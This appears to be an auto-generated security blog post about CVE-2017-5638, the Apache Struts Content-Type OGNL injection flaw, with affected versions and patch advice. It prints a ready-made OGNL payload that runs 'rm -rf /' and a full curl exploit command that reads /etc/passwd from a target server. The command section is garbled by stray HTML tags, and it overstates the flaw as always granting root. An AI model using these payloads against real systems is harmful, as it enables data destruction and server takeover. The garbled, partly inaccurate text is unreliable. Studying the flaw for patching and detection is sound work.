Listen to this Post
How the mentioned CVE works:
The CVE-2017-5638 vulnerability resides in the Jakarta Multipart parser of Apache Struts 2. The exploit is triggered when a malicious `Content-Type` header is sent with a file upload request. The parser incorrectly processes the header’s `Content-Disposition` and `Content-Type` values, evaluating them as Object-Graph Navigation Language (OGNL) expressions. This occurs due to an exception handling mechanism that tries to provide a detailed error message. An attacker can craft a request where the `Content-Type` header contains an OGNL expression, such as %{(_='multipart/form-data').(_memberAccess['allowStaticMethodAccess']=true).(@java.lang.Runtime@getRuntime().exec('rm -rf /'))}. This expression is evaluated on the server-side with root privileges, allowing the attacker to execute arbitrary system commands, leading to full server compromise.
DailyCVE Form:
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability: Remote Code Execution
Severity: Critical
date: 2017-03-07
Prediction: Patch Available
What Undercode Say:
`curl -H “Content-Type: %{(_=’multipart/form-data’).(_memberAccess[‘allowStaticMethodAccess’]=true).(@java.lang.Runtime@getRuntime().exec(‘cat /etc/passwd’))}” http://target/upload.action`
`cat /etc/passwd</h2>
<h2 style="color: blue;">rm -rf /`
<h2 style="color: blue;">
How Exploit:
Craft malicious HTTP request with OGNL expression in Content-Type header to achieve unauthenticated RCE.
Protection from this CVE:
Upgrade to Struts 2.3.32 or 2.5.10.1. Apply vendor patch. Use input validation filters.
Impact:
Complete system takeover, data theft, server becomes part of a botnet.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
